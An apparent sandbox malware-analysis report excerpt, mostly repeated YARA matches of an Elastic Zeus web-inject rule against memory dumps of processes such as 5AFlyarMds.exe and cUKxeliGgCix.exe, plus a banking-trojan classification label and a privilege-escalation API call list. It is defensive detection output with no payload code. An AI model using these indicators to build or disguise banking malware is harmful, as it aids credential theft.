    Source: 00000001.00000003.2143058636.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2078582889.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000000F.00000002.2112522705.00000000024E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2147384986.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000000F.00000002.2112434422.0000000002480000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2150345002.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2145386230.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000000.00000003.1736218436.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000027.00000002.2148807567.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000027.00000002.2148506463.0000000001270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000006.00000002.2323493665.00000000023F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2128505647.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000008.00000002.2334858118.00000000025C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000015.00000002.2119609866.00000000024B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000008.00000002.2334780970.0000000002520000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2079510438.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000001F.00000002.2132243735.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000021.00000002.2137351546.0000000003150000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2150022133.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2109527836.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.1744603416.0000000000888000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: 5AFlyarMds.exe PID: 7508, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: svchost.exe PID: 7524, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6636, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 7092, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6976, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6828, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6708, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6472, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6348, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 7136, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 7068, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 7000, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6924, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6808, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6788, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6704, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6660, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6556, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 5AFlyarMds.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: svchost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engineClassification label: mal100.bank.troj.spyw.expl.evad.winEXE@7/35@2027/24
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00401E00 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,0_2_00401E00
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_00401E00 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,1_2_00401E00
